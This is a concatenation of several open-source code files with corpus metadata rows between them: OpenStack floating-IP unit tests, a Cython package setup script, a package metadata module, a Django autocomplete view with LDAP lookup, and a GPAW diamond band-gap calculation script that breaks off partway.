self.assertEqual(2, len(floating_ips))
self.assert_calls()
def test_list_floating_ips_with_filters(self):
self.register_uris([
dict(method='GET',
uri=('https://network.example.com/v2.0/floatingips.json?'
'Foo=42'),
json={'floatingips': []})])
self.cloud.list_floating_ips(filters={'Foo': 42})
self.assert_calls()
def test_search_floating_ips(self):
self.register_uris([
dict(method='GET',
uri=('https://network.example.com/v2.0/floatingips.json'),
json=self.mock_floating_ip_list_rep)])
floating_ips = self.cloud.search_floating_ips(
filters={'attached': False})
self.assertIsInstance(floating_ips, list)
self.assertAreInstances(floating_ips, dict)
self.assertEqual(1, len(floating_ips))
self.assert_calls()
def test_get_floating_ip(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_list_rep)])
floating_ip = self.cloud.get_floating_ip(
id='2f245a7b-796b-4f26-9cf9-9e82d248fda7')
self.assertIsInstance(floating_ip, dict)
self.assertEqual('172.24.4.229', floating_ip['floating_ip_address'])
self.assertEqual(
self.mock_floating_ip_list_rep['floatingips'][0]['tenant_id'],
floating_ip['project_id']
)
self.assertEqual(
self.mock_floating_ip_list_rep['floatingips'][0]['tenant_id'],
floating_ip['tenant_id']
)
self.assertIn('location', floating_ip)
self.assert_calls()
def test_get_floating_ip_not_found(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_list_rep)])
floating_ip = self.cloud.get_floating_ip(id='non-existent')
self.assertIsNone(floating_ip)
self.assert_calls()
def test_get_floating_ip_by_id(self):
fid = self.mock_floating_ip_new_rep['floatingip']['id']
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips/'
'{id}'.format(id=fid),
json=self.mock_floating_ip_new_rep)])
floating_ip = self.cloud.get_floating_ip_by_id(id=fid)
self.assertIsInstance(floating_ip, dict)
self.assertEqual('172.24.4.229', floating_ip['floating_ip_address'])
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['tenant_id'],
floating_ip['project_id']
)
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['tenant_id'],
floating_ip['tenant_id']
)
self.assertIn('location', floating_ip)
self.assert_calls()
def test_create_floating_ip(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_new_rep,
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id'}}))
])
ip = self.cloud.create_floating_ip(network='my-network')
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['floating_ip_address'],
ip['floating_ip_address'])
self.assert_calls()
def test_create_floating_ip_port_bad_response(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_new_rep,
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id',
'port_id': u'ce705c24-c1ef-408a-bda3-7bbd946164ab'}}))
])
# Fails because we requested a port and the returned FIP has no port
self.assertRaises(
exc.OpenStackCloudException,
self.cloud.create_floating_ip,
network='my-network', port='ce705c24-c1ef-408a-bda3-7bbd946164ab')
self.assert_calls()
def test_create_floating_ip_port(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_port_rep,
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id',
'port_id': u'ce705c24-c1ef-408a-bda3-7bbd946164ac'}}))
])
ip = self.cloud.create_floating_ip(
network='my-network', port='ce705c24-c1ef-408a-bda3-7bbd946164ac')
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['floating_ip_address'],
ip['floating_ip_address'])
self.assert_calls()
def test_neutron_available_floating_ips(self):
"""
Test without specifying a network name.
"""
fips_mock_uri = 'https://network.example.com/v2.0/floatingips.json'
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []}),
dict(method='GET', uri=fips_mock_uri, json={'floatingips': []}),
dict(method='POST', uri=fips_mock_uri,
json=self.mock_floating_ip_new_rep,
validate=dict(json={
'floatingip': {
'floating_network_id': self.mock_get_network_rep['id']
}}))
])
# Test if first network is selected if no network is given
self.cloud._neutron_available_floating_ips()
self.assert_calls()
def test_neutron_available_floating_ips_network(self):
"""
Test with specifying a network name.
"""
fips_mock_uri = 'https://network.example.com/v2.0/floatingips.json'
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []}),
dict(method='GET', uri=fips_mock_uri, json={'floatingips': []}),
dict(method='POST', uri=fips_mock_uri,
json=self.mock_floating_ip_new_rep,
validate=dict(json={
'floatingip': {
'floating_network_id': self.mock_get_network_rep['id']
}}))
])
# Test if first network is selected if no network is given
self.cloud._neutron_available_floating_ips(
network=self.mock_get_network_rep['name']
)
self.assert_calls()
def test_neutron_available_floating_ips_invalid_network(self):
"""
Test with an invalid network name.
"""
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []})
])
self.assertRaises(
exc.OpenStackCloudException,
self.cloud._neutron_available_floating_ips,
network='INVALID')
self.assert_calls()
def test_auto_ip_pool_no_reuse(self):
# payloads taken from citycloud
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={"networks": [{
"status": "ACTIVE",
"subnets": [
"df3e17fa-a4b2-47ae-9015-bc93eb076ba2",
"6b0c3dc9-b0b8-4d87-976a-7f2ebf13e7ec",
"fc541f48-fc7f-48c0-a063-18de6ee7bdd7"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "ext-net",
"admin_state_up": True,
"tenant_id": "a564613210ee43708b8a7fc6274ebd63",
"tags": [],
"ipv6_address_scope": "9f03124f-89af-483a-b6fd-10f08079db4d", # noqa
"mtu": 0,
"is_default": False,
"router:external": True,
"ipv4_address_scope": None,
"shared": False,
"id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf",
"description": None
}, {
"status": "ACTIVE",
"subnets": ["f0ad1df5-53ee-473f-b86b-3604ea5591e9"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "private",
"admin_state_up": True,
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"created_at": "2016-10-22T13:46:26",
"tags": [],
"updated_at": "2016-10-22T13:46:26",
"ipv6_address_scope": None,
"router:external": False,
"ipv4_address_scope": None,
"shared": False,
"mtu": 1450,
"id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"description": ""
}]}),
dict(method='GET',
uri='https://network.example.com/v2.0/ports.json'
'?device_id=f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7',
json={"ports": [{
"status": "ACTIVE",
"created_at": "2017-02-06T20:59:45",
"description": "",
"allowed_address_pairs": [],
"admin_state_up": True,
"network_id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"dns_name": None,
"extra_dhcp_opts": [],
"mac_address": "fa:16:3e:e8:7f:03",
"updated_at": "2017-02-06T20:59:49",
"name": "",
"device_owner": "compute:None",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"binding:vnic_type": "normal",
"fixed_ips": [{
"subnet_id": "f0ad1df5-53ee-473f-b86b-3604ea5591e9",
"ip_address": "10.4.0.16"}],
"id": "a767944e-057a-47d1-a669-824a21b8fb7b",
"security_groups": [
"9fb5ba44-5c46-4357-8e60-8b55526cab54"],
"device_id": "f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7",
}]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json={"floatingip": {
"router_id": "9de9c787-8f89-4a53-8468-a5533d6d7fd1",
"status": "DOWN",
"description": "",
"dns_domain": "",
"floating_network_id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf", # noqa
"fixed_ip_address": "10.4.0.16",
"floating_ip_address": "89.40.216.153",
"port_id": "a767944e-057a-47d1-a669-824a21b8fb7b",
"id": "e69179dc-a904-4c9a-a4c9-891e2ecb984c",
"dns_name": "",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394"
}},
validate=dict(json={"floatingip": {
"floating_network_id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf", # noqa
"fixed_ip_address": "10.4.0.16",
"port_id": "a767944e-057a-47d1-a669-824a21b8fb7b",
}})),
dict(method='GET',
uri='{endpoint}/servers/detail'.format(
endpoint=fakes.COMPUTE_ENDPOINT),
json={"servers": [{
"status": "ACTIVE",
"updated": "2017-02-06T20:59:49Z",
"addresses": {
"private": [{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:e8:7f:03",
"version": 4,
"addr": "10.4.0.16",
"OS-EXT-IPS:type": "fixed"
}, {
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:e8:7f:03",
"version": 4,
"addr": "89.40.216.153",
"OS-EXT-IPS:type": "floating"
}]},
"key_name": None,
"image": {"id": "95e4c449-8abf-486e-97d9-dc3f82417d2d"},
"OS-EXT-STS:task_state": None,
"OS-EXT-STS:vm_state": "active",
"OS-SRV-USG:launched_at": "2017-02-06T20:59:48.000000",
"flavor": {"id": "2186bd79-a05e-4953-9dde-ddefb63c88d4"},
"id": "f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7",
"security_groups": [{"name": "default"}],
"OS-SRV-USG:terminated_at": None,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "c17534835f8f42bf98fc367e0bf35e09",
"name": "testmt",
"created": "2017-02-06T20:59:44Z",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
}]}),
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={"networks": [{
"status": "ACTIVE",
"subnets": [
"df3e17fa-a4b2-47ae-9015-bc93eb076ba2",
"6b0c3dc9-b0b8-4d87-976a-7f2ebf13e7ec",
"fc541f48-fc7f-48c0-a063-18de6ee7bdd7"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "ext-net",
"admin_state_up": True,
"tenant_id": "a564613210ee43708b8a7fc6274ebd63",
"tags": [],
"ipv6_address_scope": "9f03124f-89af-483a-b6fd-10f08079db4d", # noqa
"mtu": 0,
"is_default": False,
"router:external": True,
"ipv4_address_scope": None,
"shared": False,
"id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf",
"description": None
}, {
"status": "ACTIVE",
"subnets": ["f0ad1df5-53ee-473f-b86b-3604ea5591e9"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "private",
"admin_state_up": True,
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"created_at": "2016-10-22T13:46:26",
"tags": [],
"updated_at": "2016-10-22T13:46:26",
"ipv6_address_scope": None,
"router:external": False,
"ipv4_address_scope": None,
"shared": False,
"mtu": 1450,
"id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"description": ""
}]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={"subnets": [{
"description": "",
"enable_dhcp": True,
"network_id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"created_at": "2016-10-22T13:46:26",
"dns_nameservers": [
"89.36.90.101",
"89.36.90.102"],
"updated_at": "2016-10-22T13:46:26",
"gateway_ip": "10.4.0.1",
"ipv6_ra_mode": None,
"allocation_pools": [{
"start": "10.4.0.2",
"end": "10.4.0.200"}],
"host_routes": [],
"ip_version": 4,
"ipv6_address_mode": None,
"cidr": "10.4.0.0/24",
"id": "f0ad1df5-53ee-473f-b86b-3604ea5591e9",
"subnetpool_id": None,
"name": "private-subnet-ipv4",
}]})])
self.cloud.add_ips_to_server(
munch.Munch(
id='f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7',
addresses={
"private": [{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:e8:7f:03",
"version": 4,
"addr": "10.4.0.16",
"OS-EXT-IPS:type": "fixed"
}]}),
ip_pool='ext-net', reuse=False)
self.assert_calls()
def test_available_floating_ip_new(self):
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'networks.json']),
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'subnets.json']),
json={'subnets': []}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': []}),
dict(method='POST',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id'}}),
json=self.mock_floating_ip_new_rep)
])
ip = self.cloud.available_floating_ip(network='my-network')
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['floating_ip_address'],
ip['floating_ip_address'])
self.assert_calls()
def test_delete_floating_ip_existing(self):
fip_id = '2f245a7b-796b-4f26-9cf9-9e82d248fda7'
fake_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'ACTIVE',
}
self.register_uris([
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': []}),
])
self.assertTrue(
self.cloud.delete_floating_ip(floating_ip_id=fip_id, retry=2))
self.assert_calls()
def test_delete_floating_ip_existing_down(self):
fip_id = '2f245a7b-796b-4f26-9cf9-9e82d248fda7'
fake_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'ACTIVE',
}
down_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'DOWN',
}
self.register_uris([
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [down_fip]}),
])
self.assertTrue(
self.cloud.delete_floating_ip(floating_ip_id=fip_id, retry=2))
self.assert_calls()
def test_delete_floating_ip_existing_no_delete(self):
fip_id = '2f245a7b-796b-4f26-9cf9-9e82d248fda7'
fake_fip = {
'id': fip_id,
'floating_ip_address': '172.99.106.167',
'status': 'ACTIVE',
}
self.register_uris([
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(fip_id)]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fake_fip]}),
])
self.assertRaises(
exc.OpenStackCloudException,
self.cloud.delete_floating_ip,
floating_ip_id=fip_id, retry=2)
self.assert_calls()
def test_delete_floating_ip_not_found(self):
self.register_uris([
dict(method='DELETE',
uri=('https://network.example.com/v2.0/floatingips/'
'a-wild-id-appears.json'),
status_code=404)])
ret = self.cloud.delete_floating_ip(
floating_ip_id='a-wild-id-appears')
self.assertFalse(ret)
self.assert_calls()
def test_attach_ip_to_server(self):
fip = self.mock_floating_ip_list_rep['floatingips'][0]
device_id = self.fake_server['id']
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=["device_id={0}".format(device_id)]),
json={'ports': self.mock_search_ports_rep}),
dict(method='PUT',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
fip['id'])]),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {
'port_id': self.mock_search_ports_rep[0]['id'],
'fixed_ip_address': self.mock_search_ports_rep[0][
'fixed_ips'][0]['ip_address']}})),
])
self.cloud._attach_ip_to_server(
server=self.fake_server,
floating_ip=self.floating_ip)
self.assert_calls()
def test_add_ip_refresh_timeout(self):
device_id = self.fake_server['id']
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'networks.json']),
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=["device_id={0}".format(device_id)]),
json={'ports': self.mock_search_ports_rep}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json={'floatingip': self.floating_ip},
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id',
'fixed_ip_address': self.mock_search_ports_rep[0][
'fixed_ips'][0]['ip_address'],
'port_id': self.mock_search_ports_rep[0]['id']}})),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [self.floating_ip]}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
self.floating_ip['id'])]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': []}),
])
self.assertRaises(
exc.OpenStackCloudTimeout,
self.cloud._add_auto_ip,
server=self.fake_server,
wait=True, timeout=0.01,
reuse=False)
self.assert_calls()
def test_detach_ip_from_server(self):
fip = self.mock_floating_ip_new_rep['floatingip']
attached_fip = copy.copy(fip)
attached_fip['port_id'] = 'server-port-id'
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [attached_fip]}),
dict(method='PUT',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
fip['id'])]),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {'port_id': None}}))
])
self.cloud.detach_ip_from_server(
server_id='server-id',
floating_ip_id=fip['id'])
self.assert_calls()
def test_add_ip_from_pool(self):
network = self.mock_get_network_rep
fip = self.mock_floating_ip_new_rep['floatingip']
fixed_ip = self.mock_search_ports_rep[0]['fixed_ips'][0]['ip_address']
port_id = self.mock_search_ports_rep[0]['id']
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'networks.json']),
json={'networks': [network]}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'subnets.json']),
json={'subnets': []}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [fip]}),
dict(method='POST',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {
'floating_network_id': network['id']}})),
dict(method="GET",
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=[
"device_id={0}".format(self.fake_server['id'])]),
json={'ports': self.mock_search_ports_rep}),
dict(method='PUT',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
fip['id'])]),
json={'floatingip': fip},
validate=dict(
json={'floatingip': {
'fixed_ip_address': fixed_ip,
'port_id': port_id}})),
])
server = self.cloud._add_ip_from_pool(
server=self.fake_server,
network=network['id'],
fixed_address=fixed_ip)
self.assertEqual(server, self.fake_server)
self.assert_calls()
def test_cleanup_floating_ips(self):
floating_ips = [{
"id": "this-is-a-floating-ip-id",
"fixed_ip_address": None,
"internal_network": None,
"floating_ip_address": "203.0.113.29",
"network": "this-is-a-net-or-pool-id",
"port_id": None,
"status": "ACTIVE"
}, {
"id": "this-is-an-attached-floating-ip-id",
"fixed_ip_address": None,
"internal_network": None,
"floating_ip_address": "203.0.113.29",
"network": "this-is-a-net-or-pool-id",
"attached": True,
"port_id": "this-is-id-of-port-with-fip",
"status": "ACTIVE"
}]
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': floating_ips}),
dict(method='DELETE',
uri=self.get_mock_url(
'network', 'public',
append=['v2.0', 'floatingips/{0}.json'.format(
floating_ips[0]['id'])]),
json={}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingips': [floating_ips[1]]}),
])
self.cloud.delete_unattached_floating_ips()
self.assert_calls()
def test_create_floating_ip_no_port(self):
server_port = {
"id": "port-id",
"device_id": "some-server",
'created_at': datetime.datetime.now().isoformat(),
'fixed_ips': [
{
'subnet_id': 'subnet-id',
'ip_address': '172.24.4.2'
}
],
}
floating_ip = {
"id": "floating-ip-id",
"port_id": None
}
self.register_uris([
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'networks.json']),
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'subnets.json']),
json={'subnets': []}),
dict(method="GET",
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'ports.json'],
qs_elements=['device_id=some-server']),
json={'ports': [server_port]}),
dict(method='POST',
uri=self.get_mock_url(
'network', 'public', append=['v2.0', 'floatingips.json']),
json={'floatingip': floating_ip})
])
self.assertRaises(
exc.OpenStackCloudException,
self.cloud._neutron_create_floating_ip,
server=dict(id='some-server'))
self.assert_calls()
|
apache-2.0
| -3,525,956,898,842,083,300
| 40.101
| 91
| 0.467069
| false
| 3.734418
| true
| false
| false
|
bblais/plasticity
|
setup.py
|
1
|
2798
|
# this is from https://github.com/cython/cython/wiki/PackageHierarchy
import sys, os, stat, subprocess
from distutils.core import setup
from Cython.Distutils import build_ext
from distutils.extension import Extension
# we'd better have Cython installed, or it's a no-go
try:
from Cython.Distutils import build_ext
except:
print("You don't seem to have Cython installed. Please get a")
print("copy from www.cython.org and install it")
sys.exit(1)
import numpy
def get_version(package):
d={}
version_line=''
with open('%s/version.py' % package) as fid:
for line in fid:
if line.startswith('version='):
version_line=line
print(version_line)
exec(version_line,d)
return d['version']
# scan the directory for extension files, converting
# them to extension names in dotted notation
def scandir(dir, files=[]):
for file in os.listdir(dir):
path = os.path.join(dir, file)
if os.path.isfile(path) and path.endswith(".pyx"):
files.append(path.replace(os.path.sep, ".")[:-4])
elif os.path.isdir(path):
scandir(path, files)
return files
def cleanc(dir):
for file in os.listdir(dir):
path = os.path.join(dir, file)
if os.path.isfile(path) and path.endswith(".pyx"):
base,ext=os.path.splitext(path)
cpath=base+'.c'
if os.path.isfile(cpath):
os.remove(cpath)
print("~~",cpath)
elif os.path.isdir(path):
cleanc(path)
# generate an Extension object from its dotted name
def makeExtension(extName):
extPath = extName.replace(".", os.path.sep)+".pyx"
folder=extName.split(".")[0]
return Extension(
extName,
[extPath,'plasticity/randomkit.c'],
include_dirs = [numpy.get_include(), ".", "%s/" % folder], # adding the '.' to include_dirs is CRUCIAL!!
extra_compile_args = ["-O3", "-Wall"],
extra_link_args = ['-g'],
)
# get the list of extensions
extNames = scandir("plasticity")
print(extNames)
cleanc("plasticity")
# and build up the set of Extension objects
print(extNames)
extensions = [makeExtension(name) for name in extNames]
# finally, we can pass all this to distutils
setup(
name="plasticity",
version=get_version('plasticity'),
description="Synaptic Plasticity in Rate-Based Neurons",
author="Brian Blais",
packages=['plasticity',
'plasticity.dialogs',
'plasticity.dialogs.waxy'],
scripts=['plasticity/Plasticity.pyw'],
package_data={'plasticity': ['images/*.*','dialogs/images/*.*',
'dialogs/images/learning_rules/*.*','hdf5/*.*']},
ext_modules=extensions,
cmdclass = {'build_ext': build_ext},
)
|
mit
| -212,955,220,237,154,800
| 29.086022
| 114
| 0.62366
| false
| 3.578005
| false
| false
| false
|
dslackw/sbo-templates
|
sbo_templates/__metadata__.py
|
1
|
1203
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# __metadata__.py file is part of sbo-templates.
# Copyright 2015-2021 Dimitris Zlatanidis <d.zlatanidis@gmail.com>
# All rights reserved.
# SBo tool for managing templates.
# https://gitlab.com/dslackw/sbo-templates
# sbo-templates is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
__prog__ = "sbo-templates"
__author__ = "dslackw"
__copyright__ = 2015-2021
__version_info__ = (1, 3, 2)
__version__ = "{0}.{1}.{2}".format(*__version_info__)
__license__ = "GNU General Public License v3 (GPLv3)"
__email__ = "d.zlatanidis@gmail.com"
__website__ = "https://gitlab.com/dslackw/sbo-templates"
|
gpl-3.0
| -942,446,830,145,835,600
| 36.59375
| 71
| 0.717373
| false
| 3.379213
| false
| false
| false
|
mozilla/pto
|
pto/apps/autocomplete/views.py
|
1
|
1912
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import logging
from django import http
from pto.apps.dates.decorators import json_view
from pto.apps.users.models import UserProfile, User
from pto.apps.users.utils import ldap_lookup
@json_view
def cities(request):
if not request.user.is_authenticated():
return http.HttpResponseForbidden('Must be logged in')
data = []
term = request.GET.get('term')
qs = UserProfile.objects.exclude(city='')
if term:
qs = qs.filter(city__istartswith=term)
for each in (qs
.values('city')
.distinct()
.order_by('city')):
city = each['city']
data.append(city)
return data
@json_view
def users(request, known_only=False):
if not request.user.is_authenticated():
return http.HttpResponseForbidden('Must be logged in')
query = request.GET.get('term').strip()
if len(query) < 2:
return []
results = []
# I chose a limit of 30 because there are about 20+ 'peter'
# something in mozilla
for each in ldap_lookup.search_users(query, 30, autocomplete=True):
if not each.get('givenName'):
logging.warn("Skipping LDAP entry %s" % each)
continue
if known_only:
if not User.objects.filter(email__iexact=each['mail']).exists():
continue
full_name_and_email = '%s %s <%s>' % (each['givenName'],
each['sn'],
each['mail'])
result = {'id': each['uid'],
'label': full_name_and_email,
'value': full_name_and_email}
results.append(result)
return results
|
mpl-2.0
| 9,029,721,242,809,781,000
| 34.407407
| 76
| 0.578452
| false
| 4.016807
| false
| false
| false
|
ajylee/gpaw-rtxs
|
gpaw/test/diamond_gllb.py
|
1
|
2143
|
from ase.structure import bulk
from sys import argv
from ase.dft.kpoints import ibz_points, get_bandpath
from gpaw import *
from ase import *
from gpaw.test import gen
from gpaw import setup_paths
import os
"""This calculation has the following structure.
1) Calculate the ground state of Diamond.
2) Calculate the band structure of diamond in order to obtain accurate KS band gap for Diamond.
3) Calculate ground state again, and calculate the potential discontinuity using accurate band gap.
4) Calculate band structure again, and apply the discontinuity to CBM.
Compare to reference.
"""
xc = 'GLLBSC'
gen('C',xcname=xc)
setup_paths.insert(0, '.')
# Calculate ground state
atoms = bulk('C', 'diamond', a=3.567)
calc = GPAW(h=0.15, kpts=(4,4,4), xc=xc, nbands = 6, eigensolver='cg')
atoms.set_calculator(calc)
atoms.get_potential_energy()
calc.write('Cgs.gpw')
# Calculate accurate KS-band gap from band structure
points = ibz_points['fcc']
# CMB is in G-X
G = points['Gamma']
X = points['X']
#W = points['W']
#K = points['K']
#L = points['L']
#[W, L, G, X, W, K]
kpts, x, X = get_bandpath([G, X], atoms.cell, npoints=12)
calc = GPAW('Cgs.gpw', kpts=kpts, fixdensity=True, usesymm=None, convergence=dict(bands=6))
calc.get_atoms().get_potential_energy()
# Get the accurate KS-band gap
homolumo = calc.occupations.get_homo_lumo(calc.wfs)
homo, lumo = homolumo
print "band gap ",(lumo-homo)*27.2
# Redo the ground state calculation
calc = GPAW(h=0.15, kpts=(4,4,4), xc=xc, nbands = 6, eigensolver='cg')
atoms.set_calculator(calc)
atoms.get_potential_energy()
# And calculate the discontinuity potential with accurate band gap
